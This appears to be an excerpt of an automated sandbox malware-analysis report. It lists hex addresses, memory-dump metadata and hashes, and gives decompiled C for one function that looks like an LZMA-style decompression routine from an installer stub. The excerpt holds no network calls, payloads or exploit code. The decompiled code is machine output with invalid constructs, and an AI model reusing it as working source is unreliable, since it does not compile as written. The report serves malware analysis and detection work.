                0x00000000
                0x00406067
                0x00406067
                0x00000000
                0x0040606e
                0x00406072
                0x00000000
                0x00000000
                0x00406078
                0x0040607b
                0x0040607e
                0x00406081
                0x00406085
                0x00000000
                0x00000000
                0x0040608b
                0x0040608b
                0x0040608e
                0x00406090
                0x00406091
                0x00406094
                0x00406096
                0x00406097
                0x00406099
                0x0040609c
                0x004060a1
                0x004060a6
                0x004060af
                0x004060c2
                0x004060c5
                0x004060d1
                0x004060f9
                0x004060fb
                0x00406109
                0x00406109
                0x0040610d
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004060fd
                0x004060fd
                0x00406100
                0x00406101
                0x00406101
                0x00000000
                0x004060fd
                0x004060d3
                0x004060d7
                0x004060dc
                0x004060dc
                0x004060e5
                0x004060ed
                0x004060f0
                0x00000000
                0x004060f6
                0x004060f6
                0x00000000
                0x004060f6
                0x00000000
                0x00406113
                0x00406113
                0x00406117
                0x004069c3
                0x004069c3
                0x00000000
                0x004069c3
                0x0040611d
                0x00406120
                0x00406130
                0x00406133
                0x00406136
                0x00406136
                0x00406136
                0x00406139
                0x0040613d
                0x00000000
                0x00000000
                0x0040613f
                0x0040613f
                0x00406145
                0x0040616f
                0x00406175
                0x0040617c
                0x00000000
                0x0040617c
                0x00406147
                0x0040614b
                0x0040614e
                0x00406153
                0x00406153
                0x0040615e
                0x00406166
                0x00406169
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004061ae
                0x004061b4
                0x004061b7
                0x004061c4
                0x004061cc
                0x00000000
                0x00000000
                0x00406183
                0x00406183
                0x00406187
                0x004069d2
                0x004069d2
                0x00000000
                0x004069d2
                0x0040618d
                0x00406193
                0x0040619e
                0x0040619e
                0x0040619e
                0x004061a1
                0x004061a4
                0x004061a7
                0x004061ac
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00406843
                0x00406843
                0x00406849
                0x0040684f
                0x00406855
                0x0040686f
                0x00406872
                0x00406878
                0x00406883
                0x00406883
                0x00406885
                0x00406857
                0x00406857
                0x00406866
                0x0040686a
                0x0040686a
                0x0040688f
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00406891
                0x00406895
                0x00406a44
                0x00406a44
                0x00000000
                0x00406a44
                0x0040689b
                0x004068a1
                0x004068a8
                0x004068b0
                0x004068b3
                0x004068b6
                0x004068b6
                0x004068bc
                0x004068bc
                0x00000000
                0x00000000
                0x004061d4
                0x004061d4
                0x004061d6
                0x004061d9
                0x0040624a
                0x0040624a
                0x0040624d
                0x00406250
                0x00406257
                0x00406261
                0x00000000
                0x00406261
                0x004061db
                0x004061db
                0x004061df
                0x004061e2
                0x004061e4
                0x004061e7
                0x004061ea
                0x004061ec
                0x004061ef
                0x004061f1
                0x004061f6
                0x004061f9
                0x004061fc
                0x00406200
                0x00406207
                0x0040620a
                0x00406211
                0x00406215
                0x0040621d
                0x0040621d
                0x0040621d
                0x00406217
                0x00406217
                0x00406217
                0x0040620c
                0x0040620c
                0x0040620c
                0x00406221
                0x00406224
                0x00406242
                0x00406242
                0x00406244
                0x00000000
                0x00406226
                0x00406226
                0x00406226
                0x00406229
                0x0040622c
                0x0040622f
                0x00406231
                0x00406231
                0x00406231
                0x00406234
                0x00406237
                0x00406239
                0x0040623a
                0x0040623d
                0x00000000
                0x0040623d
                0x00000000
                0x00406473
                0x00406473
                0x00406477
                0x00406495
                0x00406495
                0x00406498
                0x0040649f
                0x004064a2
                0x004064a5
                0x004064a8
                0x004064ab
                0x004064ae
                0x004064b0
                0x004064b7
                0x004064b8
                0x004064ba
                0x004064bd
                0x004064c0
                0x004064c3
                0x004064c3
                0x004064c8
                0x00000000
                0x004064c8
                0x00406479
                0x00406479
                0x0040647c
                0x0040647f
                0x00406489
                0x00000000
                0x00000000
                0x004064dd
                0x004064dd
                0x004064e1
                0x00406504
                0x00406507
                0x0040650a
                0x00406514
                0x004064e3
                0x004064e3
                0x004064e6
                0x004064e9
                0x004064ec
                0x004064f9
                0x004064fc
                0x004064fc
                0x00000000
                0x00000000
                0x00406520
                0x00406520
                0x00406524
                0x00000000
                0x00000000
                0x0040652a
                0x0040652a
                0x0040652e
                0x00000000
                0x00000000
                0x00406534
                0x00406534
                0x00406536
                0x0040653a
                0x0040653a
                0x0040653d
                0x00406541
                0x00000000
                0x00000000
                0x00406591
                0x00406591
                0x00406595
                0x0040659c
                0x0040659c
                0x0040659f
                0x004065a2
                0x004065ac
                0x00000000
                0x004065ac
                0x00406597
                0x00406597
                0x00000000
                0x00000000
                0x004065b8
                0x004065b8
                0x004065bc
                0x004065c3
                0x004065c6
                0x004065c9
                0x004065be
                0x004065be
                0x004065be
                0x004065cc
                0x004065cf
                0x004065d2
                0x004065d2
                0x004065d5
                0x004065d8
                0x004065db
                0x004065db
                0x004065de
                0x004065e5
                0x004065ea
                0x00000000
                0x00000000
                0x00406678
                0x00406678
                0x0040667c
                0x00406a1a
                0x00406a1a
                0x00000000
                0x00406a1a
                0x00406682
                0x00406682
                0x00406685
                0x00406688
                0x0040668c
                0x0040668f
                0x00406695
                0x00406697
                0x00406697
                0x00406697
                0x0040669a
                0x0040669d
                0x00000000
                0x00000000
                0x0040626d
                0x0040626d
                0x00406271
                0x004069de
                0x004069de
                0x00000000
                0x004069de
                0x00406277
                0x00406277
                0x0040627a
                0x0040627d
                0x00406281
                0x00406284
                0x0040628a
                0x0040628c
                0x0040628c
                0x0040628c
                0x0040628f
                0x00406292
                0x00406292
                0x00406295
                0x00406298
                0x00000000
                0x00000000
                0x0040629e
                0x0040629e
                0x004062a4
                0x00000000
                0x00000000
                0x004062aa
                0x004062aa
                0x004062ae
                0x004062b1
                0x004062b4
                0x004062b7
                0x004062ba
                0x004062bb
                0x004062be
                0x004062c0
                0x004062c6
                0x004062c9
                0x004062cc
                0x004062cf
                0x004062d2
                0x004062d5
                0x004062d8
                0x004062f4
                0x004062f7
                0x004062fa
                0x004062fd
                0x00406304
                0x00406308
                0x0040630a
                0x0040630e
                0x004062da
                0x004062da
                0x004062de
                0x004062e6
                0x004062eb
                0x004062ed
                0x004062ef
                0x004062ef
                0x00406311
                0x00406318
                0x0040631b
                0x00000000
                0x00406321
                0x00406321
                0x00000000
                0x00406321
                0x00000000
                0x00406326
                0x00406326
                0x0040632a
                0x004069ea
                0x004069ea
                0x00000000
                0x004069ea
                0x00406330
                0x00406330
                0x00406333
                0x00406336
                0x0040633a
                0x0040633d
                0x00406343
                0x00406345
                0x00406345
                0x00406345
                0x00406348
                0x0040634b
                0x0040634b
                0x0040634b
                0x00406351
                0x00000000
                0x00000000
                0x00406353
                0x00406353
                0x00406356
                0x00406359
                0x0040635c
                0x0040635f
                0x00406362
                0x00406365
                0x00406368
                0x0040636b
                0x0040636e
                0x00406371
                0x00406389
                0x0040638c
                0x0040638f
                0x00406392
                0x00406392
                0x00406395
                0x00406399
                0x0040639b
                0x00406373
                0x00406373
                0x0040637b
                0x00406380
                0x00406382
                0x00406384
                0x00406384
                0x0040639e
                0x004063a5
                0x004063a8
                0x00000000
                0x004063aa
                0x004063aa
                0x00000000
                0x004063aa
                0x004063a8
                0x004063af
                0x004063af
                0x004063af
                0x004063af
                0x00000000
                0x00000000
                0x004063ea
                0x004063ea
                0x004063ee
                0x004069f6
                0x004069f6
                0x00000000
                0x004069f6
                0x004063f4
                0x004063f4
                0x004063f7
                0x004063fa
                0x004063fe
                0x00406401
                0x00406407
                0x00406409
                0x00406409
                0x00406409
                0x0040640c
                0x0040640f
                0x0040640f
                0x00406415
                0x004063b3
                0x004063b3
                0x004063b6
                0x00000000
                0x004063b6
                0x00406417
                0x00406417
                0x0040641a
                0x0040641d
                0x00406420
                0x00406423
                0x00406426
                0x00406429
                0x0040642c
                0x0040642f
                0x00406432
                0x00406435
                0x0040644d
                0x00406450
                0x00406453
                0x00406456
                0x00406456
                0x00406459
                0x0040645d
                0x0040645f
                0x00406437
                0x00406437
                0x0040643f
                0x00406444
                0x00406446
                0x00406448
                0x00406448
                0x00406462
                0x00406469
                0x0040646c
                0x00000000
                0x0040646e
                0x0040646e
                0x00000000
                0x0040646e
                0x00000000
                0x004066fb
                0x004066fb
                0x004066ff
                0x00406a26
                0x00406a26
                0x00000000
                0x00406a26
                0x00406705
                0x00406705
                0x00406708
                0x0040670b
                0x0040670f
                0x00406712
                0x00406718
                0x0040671a
                0x0040671a
                0x0040671a
                0x0040671d
                0x00000000
                0x00000000
                0x004064cb
                0x004064cb
                0x004064ce
                0x00000000
                0x00000000
                0x0040680a
                0x0040680a
                0x0040680e
                0x00406830
                0x00406830
                0x00406833
                0x0040683d
                0x00406840
                0x00406840
                0x00000000
                0x00406840
                0x00406810
                0x00406810
                0x00406813
                0x00406817
                0x0040681a
                0x0040681a
                0x0040681d
                0x00000000
                0x00000000
                0x004068c7
                0x004068c7
                0x004068cb
                0x004068e9
                0x004068e9
                0x004068e9
                0x004068e9
                0x004068f0
                0x004068f7
                0x004068fe
                0x004068fe
                0x00406905
                0x00406908
                0x0040690f
                0x00000000
                0x00406912
                0x004068cd
                0x004068cd
                0x004068d0
                0x004068d3
                0x004068d6
                0x004068dd
                0x00406821
                0x00406821
                0x00406824
                0x00000000
                0x00000000
                0x004069b8
                0x004069b8
                0x004069bb
                0x004068bc
                0x004068bc
                0x004068bc
                0x00000000
                0x004068c2
                0x00000000
                0x004065f2
                0x004065f2
                0x004065f4
                0x004065fb
                0x004065fc
                0x004065fe
                0x00406601
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00406905
                0x00406905
                0x00406908
                0x0040690f
                0x00000000
                0x00406912
                0x00000000
                0x00000000
                0x00000000
                0x00406637
                0x00406637
                0x0040663a
                0x00406670
                0x00406670
                0x004067a0
                0x004067a0
                0x004067a0
                0x004067a0
                0x004067a3
                0x004067a3
                0x004067a6
                0x004067a8
                0x00406a32
                0x00406a32
                0x00000000
                0x00406a32
                0x004067ae
                0x004067ae
                0x004067b1
                0x00000000
                0x00000000
                0x004067b7
                0x004067b7
                0x004067bb
                0x004067be
                0x004067be
                0x004067be
                0x00000000
                0x004067be
                0x0040663c
                0x0040663c
                0x0040663e
                0x00406640
                0x00406642
                0x00406645
                0x00406646
                0x00406648
                0x0040664a
                0x0040664d
                0x00406650
                0x00406666
                0x00406666
                0x0040666b
                0x004066a3
                0x004066a3
                0x004066a7
                0x004066d0
                0x004066d3
                0x004066d5
                0x004066dc
                0x004066df
                0x004066e2
                0x004066e2
                0x004066e7
                0x004066e7
                0x004066e9
                0x004066ec
                0x004066f3
                0x004066f6
                0x00406723
                0x00406723
                0x00406726
                0x00406729
                0x0040679d
                0x0040679d
                0x0040679d
                0x0040679d
                0x00000000
                0x0040679d
                0x0040672b
                0x0040672b
                0x00406731
                0x00406734
                0x00406737
                0x0040673a
                0x0040673d
                0x00406740
                0x00406743
                0x00406746
                0x00406749
                0x0040674c
                0x00406765
                0x00406767
                0x0040676a
                0x0040676b
                0x0040676e
                0x00406770
                0x00406773
                0x00406775
                0x00406777
                0x0040677a
                0x0040677c
                0x0040677f
                0x00406783
                0x00406785
                0x00406785
                0x00406786
                0x00406789
                0x0040678c
                0x0040674e
                0x0040674e
                0x00406756
                0x0040675b
                0x0040675d
                0x00406760
                0x00406760
                0x0040678f
                0x00406796
                0x00406720
                0x00406720
                0x00406720
                0x00406720
                0x00000000
                0x00406798
                0x00406798
                0x00000000
                0x00406798
                0x00406796
                0x004066a9
                0x004066a9
                0x004066ac
                0x004066ae
                0x004066b1
                0x004066b4
                0x004066b7
                0x004066b9
                0x004066bc
                0x004066bf
                0x004066bf
                0x004066c2
                0x004066c2
                0x004066c5
                0x004066cc
                0x004066a0
                0x004066a0
                0x004066a0
                0x004066a0
                0x00000000
                0x004066ce
                0x004066ce
                0x00000000
                0x004066ce
                0x004066cc
                0x00406652
                0x00406652
                0x00406655
                0x00406657
                0x0040665a
                0x00000000
                0x00000000
                0x004063b9
                0x004063b9
                0x004063bd
                0x00406a02
                0x00406a02
                0x00000000
                0x00406a02
                0x004063c3
                0x004063c3
                0x004063c6
                0x004063c9
                0x004063cc
                0x004063cf
                0x004063d2
                0x004063d5
                0x004063d7
                0x004063da
                0x004063dd
                0x004063e0
                0x004063e2
                0x004063e2
                0x004063e2
                0x00000000
                0x00000000
                0x00406544
                0x00406544
                0x00406548
                0x00406a0e
                0x00406a0e
                0x00000000
                0x00406a0e
                0x0040654e
                0x0040654e
                0x00406551
                0x00406554
                0x00406557
                0x00406559
                0x00406559
                0x00406559
                0x0040655c
                0x0040655f
                0x00406562
                0x00406565
                0x00406568
                0x0040656b
                0x0040656c
                0x0040656e
                0x0040656e
                0x0040656e
                0x00406571
                0x00406574
                0x00406577
                0x0040657a
                0x0040657a
                0x0040657a
                0x0040657d
                0x0040657f
                0x0040657f
                0x00000000
                0x00000000
                0x004067c1
                0x004067c1
                0x004067c1
                0x004067c5
                0x00000000
                0x00000000
                0x004067cb
                0x004067cb
                0x004067ce
                0x004067d1
                0x004067d4
                0x004067d6
                0x004067d6
                0x004067d6
                0x004067d9
                0x004067dc
                0x004067df
                0x004067e2
                0x004067e5
                0x004067e8
                0x004067e9
                0x004067eb
                0x004067eb
                0x004067eb
                0x004067ee
                0x004067f1
                0x004067f4
                0x004067f7
                0x004067fa
                0x004067fe
                0x00406800
                0x00406803
                0x00000000
                0x00406805
                0x00406805
                0x00406582
                0x00406582
                0x00000000
                0x00406582
                0x00406803
                0x00406a38
                0x00406a38
                0x00000000
                0x00000000
                0x00406067
                0x00406a6f
                0x00406a6f
                0x00000000
                0x00406a6f
                0x004068bc
                0x0040693c
                0x00406905

                Memory Dump Source
                • Source File: 00000008.00000002.289929586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000008.00000002.289868632.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.289964819.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290014852.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290078414.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290084814.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290095675.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290154899.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290281669.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 00f2de6477f22270801ef5006171c2706c5d9d3ffcda3e5f9c9b7caabde0979f
                • Instruction ID: 2446724231f05ea51107c8768389afa7e2a62b3a86e3c0cdb9b17195a5c17046
                • Opcode Fuzzy Hash: 00f2de6477f22270801ef5006171c2706c5d9d3ffcda3e5f9c9b7caabde0979f
                • Instruction Fuzzy Hash: E9A14F71E00228CFDB28CFA8C8547ADBBB1FB45305F21816AD956BB281D7785A96CF44
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040680A, Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                Download Yara Rule
                C-Code - Quality: 98%
                			E0040680A() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00406A77))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8)); // executed
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
